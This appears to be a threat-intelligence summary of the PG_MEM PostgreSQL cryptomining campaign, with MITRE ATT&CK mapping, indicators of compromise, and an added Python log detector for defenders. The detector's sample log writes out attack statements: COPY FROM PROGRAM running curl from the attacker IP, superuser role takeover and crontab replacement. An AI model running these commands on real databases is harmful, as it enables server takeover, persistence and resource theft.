Aqua Nautilus researchers uncovered PG_MEM, a PostgreSQL malware that brute-forces database credentials, uses the COPY … FROM PROGRAM feature to run shell commands, and deploys cryptominer payloads after gaining access. The campaign targets exposed PostgreSQL servers, dropping multiple binaries (PG_Core, pg_mem, memory) and using persistence and defense-evasion techniques to maintain operation. #PG_MEM #PostgreSQL #PG_Core #PG_mem #AquaNautilus #XMRIG #Shodan
Keypoints
- PG_MEM targets PostgreSQL databases via brute-force credential attacks.
- Successful access enables execution of arbitrary shell commands through PostgreSQL’s PROGRAM feature (COPY … FROM PROGRAM); the commands run as the OS user that owns the database server process.
- The actor creates a new login role with superuser privileges and then strips superuser from the existing postgres role to lock in control.
- Persistence is achieved by removing cron jobs and adding new ones to run the pg_mem payload.
- Two main payloads, PG_Core and pg_mem, are dropped for cryptomining operations, stored under /var/lib/postgresql/data/.
- Over 800,000 exposed PostgreSQL databases were identified, highlighting widespread misconfigurations and risk.
- Attack techniques are mapped to MITRE ATT&CK tactics, illustrating a multi-stage campaign spanning access, execution, persistence, and impact.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Gains initial access through the Internet-exposed Postgres database.
- [T1059.004] Command and Scripting Interpreter: Unix Shell – The attacker executes SQL commands that leverage the PROGRAM feature to run shell commands on the host system.
- [T1136.001] Create Account: Local Account – Creates a new user role with login capability and high privileges.
- [T1098] Account Manipulation – Strips superuser privileges from the existing postgres user to maintain access.
- [T1053.003] Scheduled Task/Job: Cron – Removes all cron jobs to prevent interference and adds a cron job to run pg_mem.
- [T1068] Exploitation for Privilege Escalation – Escalates privileges by executing commands as a superuser.
- [T1070.004] Indicator Removal on Host: File Deletion – Deletes files and logs related to the malware to evade detection.
- [T1036.004] Masquerading: Masquerade Task or Service – Makes the pg_core file executable and disguises it as a legitimate file.
- [T1110.002] Brute Force: Password Guessing – Uses brute force to guess the user and password of the Postgres database.
- [T1082] System Information Discovery – Gathers system information using commands like uname and whoami.
- [T1057] Process Discovery – Retrieves the process ID of the PostgreSQL backend process.
- [T1005] Data from Local System – Collects data by viewing and extracting information from the database.
- [T1105] Ingress Tool Transfer – Downloads files from a remote server to the compromised system.
- [T1071.001] Application Layer Protocol: Web Protocols – Uses web protocols to communicate with the remote server for command and control.
- [T1496] Resource Hijacking – Deploys cryptominers, leveraging the system’s resources to mine cryptocurrency.
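The keypoints and the technique list above describe a chain that is fully visible in PostgreSQL's own statement log: COPY … FROM PROGRAM, a new SUPERUSER role, NOSUPERUSER applied to postgres, and crontab edits issued from inside a COPY command. The following detector is an added example written for this page, not code from the Aqua Nautilus report. It assumes the default stderr log format with log_line_prefix = '%m [%p] %u@%d ' and statement logging enabled; the sample log lines are constructed (users, PIDs, the URL path and the exact shell commands are made up; only the IP address and the /var/lib/postgresql/data paths come from the indicators listed on this page).

```python
"""Flag PG_MEM-style abuse in PostgreSQL statement logs (added example).

Assumes log_line_prefix = '%m [%p] %u@%d ' and log_statement = 'mod' or
'all' (mod covers CREATE/ALTER ROLE and COPY FROM). Statements that span
several lines continue on tab-indented lines, which this parser skips.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample log. Only 128.199.77.96 and the data-directory paths are
# from the report; everything else is invented for the demonstration.
SAMPLE_LOG = """\
2024-08-20 10:01:02.123 UTC [4181] postgres@postgres LOG:  statement: SELECT version()
2024-08-20 10:01:05.456 UTC [4181] postgres@postgres LOG:  statement: CREATE TABLE IF NOT EXISTS cmd_out(line text)
2024-08-20 10:01:05.789 UTC [4181] postgres@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'uname -a; whoami'
2024-08-20 10:01:06.001 UTC [4181] postgres@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'curl -s http://128.199.77.96/pg_core -o /var/lib/postgresql/data/pg_core'
2024-08-20 10:01:07.002 UTC [4181] postgres@postgres LOG:  statement: CREATE ROLE helper WITH LOGIN SUPERUSER PASSWORD 'x'
2024-08-20 10:01:08.003 UTC [4181] helper@postgres LOG:  statement: ALTER ROLE postgres NOSUPERUSER
2024-08-20 10:01:09.004 UTC [4181] helper@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'crontab -r; echo "* * * * * /var/lib/postgresql/data/pg_mem" | crontab -'
2024-08-20 10:02:00.000 UTC [4190] app@shop LOG:  statement: SELECT id FROM orders WHERE status = 'paid'
2024-08-20 10:02:01.000 UTC [4190] app@shop LOG:  statement: COPY orders TO '/tmp/orders.csv'
"""

# '%m [%p] %u@%d ' prefix followed by the statement text.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)

# (label, description, pattern over the SQL text). Labels are the ATT&CK ids
# used above; the two IOC rules match artifacts from the report.
RULES: List[Tuple[str, str, "re.Pattern[str]"]] = [
    ("T1059.004", "COPY ... FROM PROGRAM runs a shell command as the server OS user",
     re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I | re.S)),
    ("T1136.001", "new role created with SUPERUSER",
     re.compile(r"\bCREATE\s+(ROLE|USER)\b.*\bSUPERUSER\b", re.I | re.S)),
    ("T1098", "superuser stripped from an existing role",
     re.compile(r"\bALTER\s+(ROLE|USER)\b.*\bNOSUPERUSER\b", re.I | re.S)),
    ("T1105", "download tool invoked from COPY FROM PROGRAM",
     re.compile(r"\bFROM\s+PROGRAM\b.*\b(curl|wget)\b", re.I | re.S)),
    ("T1053.003", "crontab manipulated from the database",
     re.compile(r"\bFROM\s+PROGRAM\b.*\bcrontab\b", re.I | re.S)),
    ("IOC-ip", "download server from the report",
     re.compile(r"\b128\.199\.77\.96\b")),
    ("IOC-path", "payload path in the data directory",
     re.compile(r"/var/lib/postgresql/data/(pg_core|pg_mem|memory|log-tmp)\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    pid: str
    user: str
    technique: str
    detail: str
    sql: str


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (pid, user, sql) for a 'statement:' log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m.group("pid"), m.group("user"), m.group("sql")


def scan(log_text: str) -> List[Finding]:
    """Apply every rule to every logged statement; one Finding per rule hit."""
    findings: List[Finding] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        parsed = parse_line(line)
        if parsed is None:
            continue  # continuation lines, DETAIL/ERROR lines, other formats
        pid, user, sql = parsed
        for label, detail, pattern in RULES:
            if pattern.search(sql):
                findings.append(Finding(line_no, pid, user, label, detail, sql))
    return findings


def findings_by_technique(log_text: str) -> Dict[str, int]:
    """Hit count per label, handy for a quick triage summary."""
    return dict(Counter(f.technique for f in scan(log_text)))


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} pid={f.pid} user={f.user} {f.technique}: {f.detail}")
        print(f"    {f.sql}")
```

Two caveats for anyone deploying this. First, nothing is logged unless log_statement is at least 'mod' (or pgaudit is in place); the default 'none' records nothing about COPY FROM PROGRAM or role changes. Second, COPY … FROM PROGRAM is only available to superusers and to members of the built-in pg_execute_server_program role (PostgreSQL 11 and later), so the complementary preventive check is a periodic query of pg_roles for rolsuper and for membership in that role, plus removing password authentication from any role exposed to the Internet.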
Indicators of Compromise
- [IP] 128.199.77.96 – Download server for the PG_Core and PG_mem payloads during delivery.
- [MD5] 3f3eae22dd67e741e87a18a2383900a5 – Memory binary detected as cryptominer; dropped to disk.
- [MD5] aacf2146cac9946592f069ef6d94635b – pg_core binary; dropped to disk with multiple detections.
- [MD5] f705c3bc4e98585357c03feac623356c – pg_mem binary; dropped to disk with multiple detections.
- [File Path] /var/lib/postgresql/data/log-tmp – temporary storage used during command execution and data staging.
Read more: https://aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/